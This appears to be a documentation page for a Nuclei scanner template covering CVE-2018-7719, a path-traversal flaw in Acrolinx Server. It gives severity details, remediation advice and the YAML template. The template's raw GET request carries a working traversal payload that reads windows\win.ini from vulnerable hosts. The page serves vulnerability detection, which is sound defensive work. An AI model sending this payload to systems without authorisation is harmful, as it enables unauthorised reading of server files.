Acrolinx Server <5.2.5 - Local File Inclusion
ID: CVE-2018-7719
Severity: high
Author: 0x_akoko
Tags: cve2018,cve,acrolinx,lfi,packetstorm,edb
Description
Section titled “Description”Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2018-7719
info: name: Acrolinx Server <5.2.5 - Local File Inclusion author: 0x_akoko severity: high description: | Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability. impact: | Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: | Upgrade Acrolinx Server to version 5.2.5 or later to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html - https://support.acrolinx.com/hc/en-us/articles/213987685-Acrolinx-Server-Version-5-1-including-subsequent-service-releases- - https://www.exploit-db.com/exploits/44345/ - https://nvd.nist.gov/vuln/detail/CVE-2018-7719 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-7719 cwe-id: CWE-22 epss-score: 0.09221 epss-percentile: 0.94118 cpe: cpe:2.3:a:acrolinx:acrolinx_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: acrolinx product: acrolinx_server tags: cve2018,cve,acrolinx,lfi,packetstorm,edb
http: - raw: - |+ GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 Host: {{Hostname}}
unsafe: true matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and# digest: 4b0a00483046022100cd536f2b00860f0f6798501dfcb8cc65b17bd56ab914daf32a904445e2820337022100de42c9c822b953a326648d2fa8ff3e7d0937e52575a76eba5fb06bac0e9cce4a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-7719.yaml"